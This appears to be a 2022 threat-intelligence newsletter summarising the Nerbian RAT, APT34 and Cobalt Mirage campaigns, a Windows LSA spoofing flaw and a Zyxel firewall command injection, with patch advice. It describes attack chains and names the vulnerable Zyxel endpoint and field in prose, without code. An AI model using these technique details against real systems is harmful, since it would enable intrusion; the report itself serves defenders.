New Nerbian RAT Observed Utilizing Significant Anti-Analysis Techniques and COVID-19 Phishing Lures
In May 2022, Proofpoint researchers publicly identified a new remote access trojan called "Nerbian RAT," that uses COVID-19 and World Health Organization (WHO)-themed lures. They also determined it has significant anti-analysis and anti-reversing capabilities. Researchers detailed that Nerbian RAT is written in Golang and uses various encryption routines to bypass network analysis. The campaign was first observed by Proofpoint on April 26, 2022, when less than 100 emails were sent to various industries, mainly located in the United Kingdom, Spain, and Italy. The email contained safety measures and symptoms relating to COVID-19 in the email body and a malicious Microsoft Word attachment. When macros are enabled in Word on the victim device, the victim viewed a seven (7) page document containing COVID-19 information (specifically regarding self-isolation and how to care for those contracted with the virus) as well as logos for the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI). The document actually executed an embedded macro that dropped a batch file that performed a PowerShell Invoke Web Request (IWR) to a specific URL, renamed the downloaded file to "UpdateUAV[.]exe", and placed it into the victim's "%AppData%/Roaming" folder. This executable served as a dropper for Nerbian RAT, and reused code from multiple open-source GitHub projects to integrate a significant set of anti-analysis and anti-reversing techniques prior to deployment. Certain conditions, if met, would stop execution of the tool. These conditions include "the existence of reverse engineering or debugging programs in the process list," the name of hard disks containing the strings "virtual", "vbox", or "vmware", or if the time elapsed was sufficiently long enough for the malware to assume it is being debugged. Checking for these conditions also ensures that the RAT is not running in a sandboxed, virtual environment, which is critical for long-term presence. Nerbian RAT was also observed having keylogging and screen capture capabilities, and researchers also detailed that the malware communicates to its command-and-control (C2) server over Secure Sockets Layer (SSL) with a "unique encryption scheme." An in-depth technical analysis of Nerbian RAT as well as indicators of compromise (IOCs) can be viewed in Proofpoint's report linked below.
Threat Actor Activity
APT34 Launches New Phishing Campaign
Iranian threat actors from APT34 are believed to be behind a new phishing campaign intended to deliver a modernized version of the Saitama backdoor. The phishing emails contain simple one-line statements from fake Government of Jordan officials stating the user must open and fill out an attached form called “Confirmation Receive Documents.xls” to receive their pending documents. Once the user executes the malicious attachment, Excel displays the workbook where a textbox states "Press 'Enable Editing' then Press 'Enable Content' to show Content of Document." After the macros are enabled, scripts embedded within the file execute and install the Saitama backdoor. Saitama masks its communications to threat actor endpoints by abusing the DNS protocol. Furthermore, the backdoor is configured to communicate with the command-and-control (C2) server at least once every 6-8 hours. To lessen the chance of threat actor compromise, CTIX analysts recommend users vet every email prior to executing attachments or hyperlinks within the email and that security teams establish phishing security controls for further security.
Iranian "Cobalt Mirage" APT Discovered Deploying Ransomware, Exfiltrating Data
Secureworks Counter Threat Unit researchers discovered a campaign that has been running since at least June 2020 and have attributed the activity to the "Cobalt Mirage" threat group. The Cobalt Mirage group is an Iranian state-sponsored threat actor that has close ties to the "Cobalt Illusion," "Phosphorous," and "TunnelVision" APTs. The threat group targets organizations in Israel, the U.S., Europe, and Australia. The researchers have broken down the Cobalt Mirage operation into two (2) distinct clusters. Cluster A has been found to use BitLocker and DiskCryptor to "conduct opportunistic ransomware attacks for financial gain," while Cluster B "focuses on targeted intrusions to gain access and collect intelligence, but some of the activity has experimented with ransomware." Both clusters have been known to conduct "scan-and-exploit," activity, exploiting known vulnerabilities in applications such as Fortinet FortiOS and Microsoft Exchange, as well as the ProxyShell vulnerability. In their most recent attacks at the beginning of 2022, the threat actors used access they obtained through exploiting the ProxyShell vulnerability to target a U.S. philanthropic organization. During the attack, Cobalt Mirage deployed custom malware based on the Fast Reverse Proxy application, a well-known tool used for directly connecting to devices behind a firewall. The threat actors then used a Local Security Authority Server Service (LSASS) credential dump to pivot across the network. Finally, BitLocker was deployed on three (3) workstations and a ransom note was sent to a local printer with a contact email address and Telegram account. In March 2022, Cluster B used techniques similar to those used on the philanthropic organization to target a U.S. local government network, but instead focused on exfiltrating data rather than deploying ransomware. Due to the threat group's technique of remaining dormant for months at a time, CTIX analysts recommend all organizations scan their network for indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) relating to the Cobalt Mirage APT.
Actively Exploited Windows Server Vulnerability Allows Attackers to Take Full Domain Control
Microsoft patched a critical zero-day Windows Server Local Security Authority (LSA) spoofing vulnerability which has been exploited In-the-Wild, allowing threat actors to escalate their privileges, giving them full control of the domain. LSA is a Windows subsystem used to enforce the security policies on local and remote machines. The flaw, tracked as CVE-2022-26925, appears to be related to the infamous "PetitPotam," Windows New Technology LAN Manager (NTLM) relay attacks on Active Directory Certificate Services (AD CS), first identified in the summer of 2021 and abused by the "LockFile" ransomware group. Although critical, this exploitation is a highly complex attack, and requires sophisticated threat actors to conduct a Man-in-the-Middle (MITM) attack to request a method on the LSA Remote Procedure Call (LSARPC) interface. This could allow them to remotely intercept legitimate authentication requests, coercing the domain controller to authenticate the attackers via the NTLM security protocol. Once the attackers have control, they can execute malware, leak sensitive data, and carry out other malicious network activity. The security update fixes the vulnerability by detecting and blocking anonymous LSARPC connection attempts. This flaw affects all versions of Windows Server, and according to Microsoft's advisory, "domain controllers should be prioritized in terms of applying security updates." Additional manual hardening techniques for mitigating NTLM relay attacks in-general are detailed in the Windows advisory linked below. The CTIX team urges any-and-all Windows network administrators to ensure their infrastructure reflects the most current security posture, and that they have added defense-in-depth for protecting against NTLM attacks.
Zyxel Patches Critical Vulnerability Affecting Thousands of their Firewall Products
Zyxel Networks has fixed a critical vulnerability in their firewall firmware that could allow threat actors to take full control of a vulnerable device as an initial access attack vector, and then move laterally across the target network to conduct other malicious activity. Zyxel is a networking service provider that provides security, AI, and cloud solutions to corporate networks. The flaw, tracked as CVE-2022-30525, is described as an unauthenticated and remote code execution (RCE) vulnerability, using the administrative HTTP interface, impacting Zyxel Zero Touch Provisioning (ZTP) supported firewall products. These devices are very popular and are scaled to be used for both small corporate branch and corporate headquarter deployments, and typically offer services like VPN, SSL inspection, intrusion detection/protection, and corporate email security. The vulnerability was disclosed by researchers from the Rapid7 cybersecurity firm, who at the time of their report publishing, stated that via Shodan IoT scans, they identified at least 15,000 vulnerable instances of these products connected to the internet. The researchers also published a Proof-of-Concept (PoC) exploit, creating a Metasploit module which exploits a command injection exposed by "/ztp/cgi-bin/handler" when the handler controls "setWanPortSt" commands. The Metasploit module adds operating system commands to a "setWanPortSt" field, allowing the attacker to execute commands as a "nobody" user. Typically, Rapid7 has a 60-day disclosure policy for responsibly reporting on known exploits, however Zyxel patched this flaw in secret on April 28th, 2022, which puts network and cybersecurity personnel at a disadvantage. When patches are released, both hackers and security professionals reverse-engineer the patch to identify the exact exploitation details, allowing attackers to attempt variations of the exploit and for security personnel to know/understand how to best defend against those types of attacks. By silently reporting, only the attackers tend to find the patch, because they are always scanning and probing the internet for vulnerabilities, unlike defenders who typically only reverse-engineer patches when their advisories are published. Given this, Rapid7 decided to publish their vulnerability report early so that defenders would be aware of the threats to their infrastructure and could begin proactively defending against similar attacks or variants that bypass the security patch. The CTIX team urges all Zyxel firewall customers to update to their latest patch immediately, as well as enabling automatic updates. Rapid7 also recommends disabling WAN access to the administrative HTTP interface.
The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days and typically include high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (email@example.com) if additional context is needed.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.